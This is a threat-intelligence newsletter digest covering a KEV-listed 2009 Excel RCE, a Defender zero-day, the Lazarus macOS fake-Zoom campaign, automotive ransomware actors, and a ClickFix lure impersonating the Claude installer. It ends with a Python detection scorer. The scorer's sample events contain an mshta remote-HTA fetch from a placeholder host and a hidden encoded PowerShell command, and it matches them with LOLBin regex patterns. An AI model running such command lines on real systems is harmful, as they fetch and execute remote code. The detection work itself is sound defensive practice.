the threat gazette
Afternoon Update
Intraday Update
Ransomware

Microsoft Defender Zero-Day and 17-Year-Old Excel RCE (CVE-2009-0238) Both Hit KEV

CVE-2009-0238 CVE-2026-26151 CVE-2026-33825 APT29 APT41 Evilnum Hunters International LockBit Qilin UNC1069 UNC2465 Chaos ConnectWise EVILNUM Qilin SMOKEDHAM SynAck UPPERCUT jRAT

This THN bulletin aggregates multiple distinct threat vectors, the most analytically striking of which is CVE-2009-0238 — a Microsoft Office Excel RCE from 2009 now confirmed in KEV with a due date of April 28, 2026, and an EPSS of 0.57, indicating active exploitation at material scale. The Defender zero-day (likely CVE-2026-26151 or CVE-2026-33825, both unpopulated in CVE intel — consistent with very recent assignment) warrants direct review of the bulletin, as a bypass of the primary endpoint protection layer is a force-multiplier for any concurrent campaign. SonicWall brute-force activity rounds out the edge-device exposure picture. The actor breadth — APT29, APT41, LockBit, Qilin, UNC1069, UNC2465, Evilnum, Hunters International — reflects the roundup format rather than a single coordinated campaign, but each thread carries independent operational weight.

CVE-2009-0238 entering KEV in 2026 is the sleeper signal here: a 17-year-old Excel parsing bug with EPSS approaching 0.58 implies a threat actor is actively working the document-delivery vector against organizations still ingesting untrusted Office files — which describes most of the enterprise. The Defender zero-day is the more acute concern operationally, but without populated CVE intel for the 2026 CVEs, severity and patch status require direct bulletin review. Qilin's listing here is consistent with their appearance in the automotive ransomware report (story 5233).

CVE-2009-0238 reaching KEV in 2026 with EPSS approaching 0.58 is the second data point in two days for yesterday's NVD/scoring-mismatch editorial — Thursday's observation that ancient Excel bugs are quietly being operationalized didn't have to wait long for confirmation. The Defender bypass is the acute operational item and warrants direct bulletin review given the CVE intel gap; the roundup format here carries more weight than usual because the underlying signal is coherent.

2026-04-16
1 source

Editorial

The headline item for this readership is Microsoft's Sapphire Sleet (Lazarus) dissection: a macOS intrusion chain explicitly aimed at cryptocurrency and finance staff, using zero CVEs and a fake Zoom update that coaxes the user into clearing Gatekeeper themselves. This is the macOS expression of the trust-layer theme we've been tracking all week — attackers have stopped trying to defeat platform controls and are instead walking users through consenting past them, which means macOS fleet posture for treasury, markets, and digital-asset roles now needs the same social-engineering assumptions we already make for Windows. Rapid7's ClickFix campaign impersonating the Claude AI installer is the developer-class complement to the same mechanic: different lure, identical premise, and another data point that AI-consumer tooling is now fully absorbed into the phishing surface alongside the HuggingFace/LLM-proxy platform abuse from yesterday.

Halcyon's automotive numbers — Scattered Spider, Akira, Qilin, and BlackSuit responsible for 44% of sector ransomware — are not a sector story; they are a cross-sector actor-overlap story, because that is precisely the cohort running the Salesforce, SSO, and help-desk playbooks against financial services. Treat the automotive TTPs as early warning for our own IR runbooks rather than adjacent-industry color. Meanwhile the Defender zero-day landing in the same THN bulletin as a 17-year-old Excel RCE (CVE-2009-0238, freshly KEV-listed) is the second data point this week for the scoring-architecture thread — temporally incoherent exploitation is the steady state now, and any triage that still implicitly privileges "recent" is quietly miscalibrated against what's actually being used.

Notable

Malware

Microsoft Dissects Sapphire Sleet macOS Chain: Finance-Targeted, Zero CVEs, User-Assisted Execution

Lazarus Group LookBack

Microsoft Threat Intelligence has published a 5,600-word technical dissection of a Sapphire Sleet (Lazarus Group) macOS campaign that deliberately avoids software exploitation in favor of user-assisted execution — the attack impersonates a legitimate software update (specifically a fake Zoom update, per secondary coverage in story 5311) to induce victims into manually running malicious files, bypassing macOS Gatekeeper and notarization controls by design. The campaign explicitly targets high-value individuals and organizations in cryptocurrency, digital assets, and finance, collecting credentials, crypto wallet contents, and personal data. IOCs are available in the primary report. The same campaign is summarized in secondary coverage at stories 5310 and 5311.

The deliberate absence of CVE-based exploitation is the defining characteristic here — this campaign is specifically engineered to evade endpoint detection that monitors for process exploitation chains, shellcode injection, and memory anomalies, shifting the detection surface to user behavior analytics and anomalous process trees spawned from user-executed binaries. Financial institutions with employees active in digital asset markets are within the explicit target demographic, and the Zoom lure has high social plausibility in that population.

Continues this week's trust-layer thread — session and credential theft without CVE use, engineered so the endpoint never sees an exploitation chain to flag. Pair user-awareness messaging with this morning's trojanized-Slack story (5089); both rely on authenticated users voluntarily executing trusted-looking binaries, and the detection surface for both shifts to behavioral analytics and anomalous process trees under user-launched installers.

Ransomware

Scattered Spider, Akira, Qilin, BlackSuit Drive 44% of Automotive Ransomware

Akira BlackSuit Qilin Scattered Spider

Halcyon's sector analysis places four ransomware operators — Scattered Spider, Akira, BlackSuit, and Qilin — at 44% of observed automotive industry attacks, documenting a meaningful targeting concentration in critical manufacturing. The automotive vertical's OT/IT convergence, high-value supply chain interdependencies, and production-continuity pressure create coercion dynamics structurally analogous to financial services. Qilin's presence here is consistent with their concurrent KEV-adjacent activity documented in story 5180.

The directional read for financial services is that this actor set — particularly Scattered Spider, which has documented financial sector targeting and mature social engineering TTPs including helpdesk vishing and SIM swapping — does not treat automotive as an exclusive vertical. The 44% concentration figure carries Halcyon's sampling bias, but the actor composition is independently corroborated across multiple sources and should not be discounted on that basis.

Halcyon's vertical framing obscures the cross-sector read: Scattered Spider in particular does not silo by industry, and their helpdesk-vishing / SIM-swap / SSO-token-theft TTPs map directly onto financial services. Qilin also surfaces in today's story 5180 cluster. Discount the 44% for Halcyon's sampling bias; don't discount the actor composition.

Social Engineering

ClickFix Campaign Impersonates Claude AI Installer to Land mshta/PowerShell/Injection Chain

T1027.010 T1027.013 T1055 T1059.001 T1218.005 cmd

Rapid7's MDR team observed a ClickFix campaign impersonating the Claude AI installer to deliver malware via mshta.exe (T1218.005), PowerShell (T1059.001), process injection (T1055), and two obfuscation techniques (T1027.010 command obfuscation, T1027.013 encoded file). The ClickFix social engineering pre-stage — presenting a fake error that prompts the victim to manually paste and execute a malicious command — bypasses Mark-of-the-Web protections and download-time AV scanning entirely. No attribution to a named threat actor. IOCs are available.

The Claude impersonation is tactically deliberate: Claude's user base skews technical and developer-class, representing targets with elevated system access and broad credential scope. Rapid7's characterization of the campaign as 'small' suggests either targeted deployment against a specific cohort or early-stage capability testing before wider rollout. The technique set is competent but not novel; the social engineering layer is the operational differentiator.

The AI-brand lure is the novel layer, not the delivery chain — ClickFix's Mark-of-the-Web bypass is by now table stakes. Rapid7's 'small' characterization reads as targeted early-stage deployment against a technical cohort with elevated credentials; expect AI-vendor impersonation to mature into a phishing staple alongside the usual Microsoft/Adobe/DocuSign rotation.
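Added example, not code from Rapid7's or Microsoft's reporting: a toy scorer over constructed Sysmon-style process-creation events that implements the detection surface both the Sapphire Sleet and ClickFix items point at, a LOLBin chain (mshta.exe into PowerShell with an encoded command) started under the interactive user shell rather than from an exploited process. The event fields, the explorer.exe launcher assumption, the regexes and the weights are assumptions for this example.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Field names and the interactive-launcher set are assumptions for this example.
SAMPLE_EVENTS = [
    {"pid": 1001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/claude-setup.hta"},
    {"pid": 1002, "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -enc QUFBQUFBQUFB"},
    {"pid": 1003, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -NoProfile Get-ChildItem"},
    {"pid": 1004, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}
USER_SHELLS = {"explorer.exe"}  # a pasted Win+R command is parented here (assumption)
ENCODED = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)   # T1027.013
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
REMOTE_HTA = re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)   # T1218.005

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(ev):
    """Return (score, reasons); each signal alone is weak, the chain is what matters."""
    score, reasons = 0, []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["command_line"]
    if image in LOLBINS and parent in USER_SHELLS:
        score += 2; reasons.append("LOLBin started directly from the user shell")
    if image in LOLBINS and parent == "mshta.exe":
        score += 2; reasons.append("T1059.001 interpreter spawned by mshta")
    if REMOTE_HTA.search(cmd):
        score += 3; reasons.append("T1218.005 mshta loading remote HTA")
    if ENCODED.search(cmd):
        score += 2; reasons.append("T1027.013 encoded command")
    if HIDDEN.search(cmd):
        score += 1; reasons.append("hidden window requested")
    return score, reasons

def triage(events, threshold=3):
    """PIDs whose combined signals reach the threshold, with the reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["pid"], score, reasons))
    return hits

if __name__ == "__main__":
    for pid, score, reasons in triage(SAMPLE_EVENTS):
        print(pid, score, "; ".join(reasons))
```

On the constructed events, the interactive PowerShell session (pid 1003) scores below the threshold on its own while both links of the mshta chain are surfaced; the same parent/child reasoning applies to user-launched installers on macOS once the launcher set is swapped.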

Briefs

Vulnerabilities

Wordfence Weekly WordPress Vulnerability Roundup (April 6–12)

Weekly summary of 153 WordPress plugin vulnerabilities with maximum EPSS of 0.057, indicating minimal exploitation risk.
